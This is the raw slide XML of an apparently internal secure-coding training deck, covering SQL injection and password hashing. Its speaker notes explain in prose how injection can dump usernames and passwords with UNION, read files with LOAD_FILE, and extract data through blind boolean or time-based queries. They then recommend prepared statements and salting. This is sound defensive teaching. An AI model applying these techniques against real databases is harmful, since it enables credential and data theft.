              <a:t>This can get out of hand very quickly. Hopefully you can start to imagine other ways in which this could be dangerous if your code is susceptible to SQL injection.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Shape 506"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Shape 507"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You may have come across this XKCD comic before, about a boy called Little Bobby Tables. If you didn't know what SQL injection was before, you should hopefully now start to have an idea of what's going on here.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Shape 517"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Shape 518"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There’s even a (completely legitimate) company in the UK with an SQL injection as their name. The Companies House site isn't susceptible to SQL injection, so this all works perfectly fine.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Shape 526"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Shape 527"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The key takeaway here is that you should never let your users directly modify the SQL being executed. Users should be providing values only, and not be allowed to alter the structure of your query. If you need to have different queries executed based on some value the user picks, then they should be two distinct queries in your code.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Shape 536"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Shape 537"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The key takeaway here is that you should never let your users directly modify the SQL being executed. Users should be providing values only, and not be allowed to alter the structure of your query. If you need to have different queries executed based on some value the user picks, then they should be two distinct queries in your code.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Shape 547"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Under normal conditions, you're meant to provide an ID number, and you'll get the user's name in return. This is how it's intended to be used. But if it's susceptible to SQL injection, there's a lot more information you can get out...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If you've joined PagerDuty in the last year, then this will be your first time going through this particular training course. It's had rave reviews in the past, as you can see here from this completely genuine testimonial quote, which I totally didn't make up in any way.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Shape 558"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="Shape 559"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What if we use a wildcard % instead of an ID number? Now we'll be able to see everyone's name from your user table. Something like this could allow an attacker to steal a full list of your users. But it's not too bad right? They can only get names and nothing super important like passwords...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Shape 570"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Shape 571"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Unfortunately, once you have a single instance of SQL injection, it's pretty much game over and you can grab almost any data that you want. Here we can use a UNION to steal the usernames and passwords for every user too. But it's not too bad right? You can't access files on the filesystem or anything...</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Shape 580"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Shape 581"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Like I said, it's pretty much game over once you have an SQL injection point. You could use LOAD_FILE to load things from the filesystem too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr i="1"/>
            </a:pPr>
            <a:r>
              <a:t>It's worth noting that this isn't always possible, it will depend on permissions and any extra security the operating system has, but it's feasible at least.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Shape 590"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Shape 591"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So far this example has required the output to be presented directly to the user in order to be useful. But even if that's not the case, you can still extract information, it just takes a bit longer. There's a technique called "Blind Injection" which can accomplish this. There are two main types...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Shape 601"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Shape 602"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The first is boolean, where you can tell the database to throw an error depending on if a certain value is true or false. It'll take a while, but can easily be scripted to extract data.</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Shape 612"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Shape 613"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The other is time-based, where you can use the same technique, but add a time-delay and use that to extract the true or false value. Once you have an SQL injection, attackers can be very sneaky in the way data is exfiltrated.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6" name="Shape 626"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So how can we start to protect against SQL injection? Some folks like to try and add checks that will stop a statement from executing if it has "bad" words like DROP in it. Unfortunately, that isn't going to work. Not only would you need to maintain such a blacklist, and be careful to make it case-insensitive, etc. But there's always going to be ways around it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Likewise, you might think that you can just escape all quotes from user input in order to stop the query being modified. Depending on the language you're using, these types of checks can also be bypassed in various sneaky ways. There's always going to be some strange Unicode character you hadn't thought of that gets interpreted as a quote, or something silly like that. It's not really worth investing in these types of checks.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2" name="Shape 642"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What about parameter validation instead? If we only expect a field to contain an integer, we can just reject any input that's not what we expect it to be. This would certainly work for integer fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If a field only expects alphanumeric characters, again you can just restrict to those characters. This would also work, but you're going to start running into issues where users really do need to enter other characters. What about hyphens in people's names? What if you're running a website like Stack Overflow and you need to allow users to enter actual code samples in their comments?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Surely there's a better way?!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1" name="Shape 651"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Shape 652"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We want to use something called "Prepared Statements" to solve this problem. This is one of the most surefire ways to protect against SQL injection.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2" name="Shape 662"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Shape 663"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>But what are they? Well, they're essentially an SQL template, where user values are substituted at runtime and can't modify the query. There's an added bonus here where this can also improve performance, as you can execute similar queries repeatedly with high efficiency.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Before we delve into the main content, I wanted to give you all a quick reminder of our slide classifications. We went through this at the last training, but the same applies to this one too. Please respect the classifications that are added to these slides and don't share ones which shouldn't be shared. As with our previous training, this one will also be open-sourced so you can share it with friends and family, and the internal version will be available on the wiki along with the recording.</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Shape 677"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Shape 678"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's look at how prepared statements work. The first step is to "prepare" the query. This is where you define how your SQL statement will look, but the value is left blank, and instead you define a "placeholder" (there are other names that can be used here too).</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6" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The query is then sent to the database management system, where it’s compiled and optimized, but not executed (since it doesn't have any values yet).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7" name="Shape 717"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Shape 718"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The query is then sent to the database management system, where it’s compiled and optimized, but not executed (since it doesn't have any values yet).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6" name="Shape 726"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Shape 727"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Because the parameter values are transmitted later using a different protocol, they don't need to be correctly escaped. Assuming the original statement template is not derived from external input, SQL injection cannot occur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We also get some optimization benefits from using this method as it’s compiled once on the DB and executed many times with different data.</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7" name="Shape 737"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Shape 738"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Here's a quick pseudocode example of how it would all look when tied together.</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7" name="Shape 747"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="Shape 748"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SQL injection is one of the more common vulnerabilities that exist, and it can be devastating if exploited. There's lots of nuance involved and lots more I could have talked about. But since we don't have all day, here are some additional reading links if you're interested in understanding more about SQL injection and how to exploit it. The cheat sheets are particularly eye-opening.</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6" name="Shape 756"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Shape 757"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SQL injection is one of the more common vulnerabilities that exist, and it can be devastating if exploited. There's lots of nuance involved and lots more I could have talked about. But since we don't have all day, here are some additional reading links if you're interested in understanding more about SQL injection and how to exploit it. The cheat sheets are particularly eye-opening.</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5" name="Shape 775"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Shape 776"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>First, let's quickly reHASH (get it?) what we covered in the last training.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A hash will take a value, and give you some seemingly random gibberish as an output. Given the same input, it will always give you the same output.</a:t>
            </a:r>
          </a:p>
          <a:p>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4" name="Shape 794"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Shape 795"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>They are essentially a one-way mathematical function. The idea is that it's very easy to take a value, and get a repeatable hash of it. But it's very difficult to have just the hash and reverse it back into the password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Imagine trying to multiply two large prime numbers, multiplication is pretty easy and that wouldn't take too long. But what if you had the final number, and you had to discover which two prime numbers were multiplied to get it? That's going to be much harder to do. That's pretty much what's going on here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So once you have a hashed value, you essentially can't get back to the password, unless you already have a mapping from hash back to password.</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5" name="Shape 805"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="806" name="Shape 806"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is what a rainbow table is. A precomputed list of hashes back to their original value. It allows you to quickly reverse hashes. You can get rainbow tables for all of the common hashing algorithms in use. I used SHA-1 in all my examples from the last training.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So why are you all here today? The goal of today's training is to give you the opportunity to learn about a variety of common security vulnerabilities that are relevant when developing software. I'm not just going to show you what they are, and how to stop them, but I'm also going to show you how to exploit them too. Exploiting these vulnerabilities is usually the best way to really learn how they work, and is an important part of knowing how to stop them. Plus it's more fun to show you how to exploit them.</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6" name="Shape 816"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Shape 817"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I said in the previous training that there's something called "salting" which can protect against this type of attack. So what is this "salting" stuff?</a:t>
            </a:r>
          </a:p>
          <a:p>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6" name="Shape 826"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Shape 827"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
